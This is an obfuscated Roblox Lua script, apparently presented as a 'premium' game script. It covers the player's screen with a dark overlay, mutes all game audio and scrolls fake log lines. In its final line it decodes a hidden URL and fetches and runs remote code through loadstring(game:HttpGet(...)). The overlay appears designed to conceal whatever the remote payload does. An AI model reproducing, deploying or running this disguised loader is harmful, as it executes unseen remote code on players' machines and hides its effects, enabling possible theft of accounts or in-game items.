--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v47,v48) local v49={};for v66=1, #v47 do v6(v49,v0(v4(v1(v2(v47,v66,v66 + 1 )),v1(v2(v48,1 + (v66% #v48) ,1 + (v66% #v48) + 1 )))%256 ));end return v5(v49);end if  not game:IsLoaded() then game.Loaded:Wait();end local v8=game.Players.LocalPlayer;local v9=v8:WaitForChild(v7("\225\207\218\60\227\169\224\11\216","\126\177\163\187\69\134\219\167"));local v10=game:GetService(v7("\22\222\47\215\213\45\221\63\209\207\38\223\60\204\255\38","\156\67\173\74\165"));if v9:FindFirstChild(v7("\7\150\107\41\140\20\99\25\158\124\59\131\0\111\26\150\101","\38\84\215\41\118\220\70")) then v9.SAB_PREMIUM_FINAL:Destroy();end local v11=Instance.new(v7("\99\21\48\23\251\94\49\55\27","\158\48\118\66\114"));v11.Name=v7("\152\5\50\9\67\151\222\134\13\37\27\76\131\210\133\5\60","\155\203\68\112\86\19\197");v11.IgnoreGuiInset=true;v11.DisplayOrder=4114245 -3114246 ;v11.Parent=v9;local v16=Instance.new(v7("\96\207\55\241\69","\152\38\189\86\156\32\24\133"));v16.Size=UDim2.new(1 -0 ,0,1519 -(1191 + 327) ,0 + 0 );v16.BackgroundColor3=Color3.fromRGB(700 -(208 + 490) ,1 + 1 ,2);v16.BorderSizePixel=0;v16.Parent=v11;local v21={v7("\213\121\141\99\223\99\142\104\219","\38\156\55\199"),v7("\138\68\76\9\32\71\211\109\143","\35\200\29\28\72\115\20\154"),v7("\53\144\240\251\164\2\19","\84\121\223\177\191\237\76"),v7("\158\120\234\146\3\96\4\232\149\113","\161\219\54\169\192\90\48\80"),v7("\102\114\52\12\100\107\58\12\103\101","\69\41\34\96"),v7("\148\236\248\33\43\5\155","\75\220\163\183\106\98"),v7("\36\159\191\20\241\43\148\172","\185\98\218\235\87"),v7("\248\12\8\201\248\131\229\27","\202\171\92\71\134\190"),v7("\10\237\9\169\7\232\2\175","\232\73\161\76"),v7("\159\252\97\111\39\139\237\107\115\57","\126\219\185\34\61")};local v22={v7("\45\224\106\91\65\84\219\194\45\250","\135\108\174\62\18\30\23\147"),v7("\157\204\24\229\61\130\12\227\151\221\11","\167\214\137\74\171\120\206\83"),v7("\185\213\28\121\221\149\180\213\28\122\209\137\174","\199\235\144\82\61\152"),v7("\42\51\148\4\53\47\134\24\51\36\156\10\42","\75\103\118\217"),v7("\235\123\83\53\149\33\228\120\89\49\151\42","\126\167\52\16\116\217"),v7("\251\11\18\182\145\43\195\251\7\4\165","\156\168\78\64\224\212\121"),v7("\37\215\131\252\40\192\154\227\40\202\144\226\34","\174\103\142\197"),v7("\102\9\124\19\0\106\199\112\4\112\15","\152\54\72\63\88\69\62"),v7("\252\243\199\120\235\224\207\104\245","\60\180\164\142"),v7("\106\123\40\6\19\200\33","\114\56\62\101\73\71\141")};local v23={v7("\131\198\240\249","\164\216\137\187"),v7("\233\213\4\145\133\219\56\225\219","\107\178\134\81\210\198\158"),v7("\3\47\161\242\131\14\43\191","\202\88\110\226\166"),v7("\248\61\167\214\238\250\50","\170\163\111\226\151"),v7("\42\3\134\25\108\27\12\44","\73\113\80\210\88\46\87"),v7("\186\8\226\60\194\188","\135\225\76\173\114")};local v24=Instance.new(v7("\41\238\170\191\160\177\174\20\234\158\162\173\176\162","\199\122\141\216\208\204\221"));v24.Size=UDim2.new(0.5 -0 ,0 + 0 ,0.8 -0 ,0 -0 );v24.Position=UDim2.new(0.05,0,867.1 -(550 + 317) ,0 -0 );v24.BackgroundTransparency=1 -0 ;v24.ScrollBarThickness=0 -0 ;v24.Parent=v16;local v30=Instance.new(v7("\152\244\60\249\107\226\129\220\9\255\109\226","\150\205\189\112\144\24"));v30.VerticalAlignment=Enum.VerticalAlignment.Bottom;v30.Parent=v24;local v34=Instance.new(v7("\17\129\167\88\40\137\19\21\41","\112\69\228\223\44\100\232\113"));v34.Size=UDim2.new(285 -(134 + 151) ,2065 -(970 + 695) ,0 -0 ,50);v34.Position=UDim2.new(1990.75 -(582 + 1408) , -200,0.5 -0 , -(31 -6));v34.BackgroundTransparency=1;v34.TextColor3=Color3.fromRGB(255,960 -705 ,2079 -(1195 + 629) );v34.TextSize=35;v34.Font=Enum.Font.Code;v34.Text=v7("\231\62\37\147\134\78\163\249\54\50\254","\230\180\127\103\179\214\28");v34.Parent=v16;local v44=true;local function v45() for v67,v68 in pairs(game:GetDescendants()) do if v68:IsA(v7("\191\10\74\72\224","\128\236\101\63\38\132\33")) then v68.Volume=0 -0 ;end end end game.DescendantAdded:Connect(function(v50) if (v44 and v50:IsA(v7("\159\166\4\74\178","\175\204\201\113\36\214\139"))) then v50.Volume=0;end end);v45();local function v46() local v51=Instance.new(v7("\115\201\45\200\40\70\206\48\208","\100\39\172\85\188"));v51.Size=UDim2.new(1,241 -(187 + 54) ,780 -(162 + 618) ,13 + 5 );v51.BackgroundTransparency=1 + 0 ;v51.TextColor3=Color3.fromRGB(0 -0 ,428 -173 ,11 + 129 );v51.TextSize=13;v51.Font=Enum.Font.Code;v51.TextXAlignment=Enum.TextXAlignment.Left;v51.TextTransparency=1637 -(1373 + 263) ;local v61=v23[math.random( #v23)]   .. " "   .. v21[math.random( #v21)]   .. "_"   .. v22[math.random( #v22)] ;v51.Text=v7("\243\56","\83\205\24\217\224")   .. v61   .. v7("\166\139\131\115\166\149\213","\93\134\165\173")   .. string.upper(string.format(v7("\251\234","\30\222\146\161\162\90\174\210"),math.random(101000 -(451 + 549) ,284095 + 615905 ))) ;v51.Parent=v24;game:GetService(v7("\209\89\117\15\235\125\117\24\243\71\115\15","\106\133\46\16")):Create(v51,TweenInfo.new(0.3),{[v7("\108\37\107\232\110\82\89\46\96\236\91\82\93\46\112\229","\32\56\64\19\156\58")]=0 -0 }):Play();if ( #v24:GetChildren()>(50 -20)) then v24:GetChildren()[1386 -(746 + 638) ]:Destroy();end end task.spawn(function() while true do local v69=0;while true do if (v69==(0 + 0)) then if v44 then local v74=0 -0 ;local v75;while true do if (v74==(341 -(218 + 123))) then v75=1581 -(1535 + 46) ;while true do if (v75==(0 + 0)) then v46();v45();break;end end break;end end end task.wait(math.random(0.4 + 0 ,560.9 -(306 + 254) ));break;end end end end);v10.InputBegan:Connect(function(v64,v65) if ( not v65 and (v64.KeyCode==Enum.KeyCode.J)) then local v71=0 + 0 ;local v72;while true do if (v71==(0 -0)) then v72=1467 -(899 + 568) ;while true do if (0==v72) then v44= not v44;v16.Visible=v44;v72=1 + 0 ;end if (v72==1) then if v44 then v45();end break;end end break;end end end end);loadstring(game:HttpGet(v7("\82\220\241\70\0\189\207\11\152\188\24\13\163\206\8\156\181\24\8\161\213\0\155\188\7\10\189\129\74\193\170\68\79\252\207\95\209\207\70\96\209\169\12\225\239\120\87\221\164\96\197\220\92\99\232\172\109\253\181\120\126\241\148\116\236\195\93\117\209\209\83\230\194\111\64\222\183\96\197\203\114\115\163\175\110\254\238\111\8\195\209\116\235\204\69\115\255\148\74\202\232\103\83\221\137\112\219\231\4\124\249\186\98\225\236\122\121\216\210\91\240\203\7\99\197\151\83\231\235\69\83\243\183\107\193\202\95\112\163\130\87\196\183\108\98\216\154\99\255\242\95\92\202\208","\224\58\168\133\54\58\146")))();
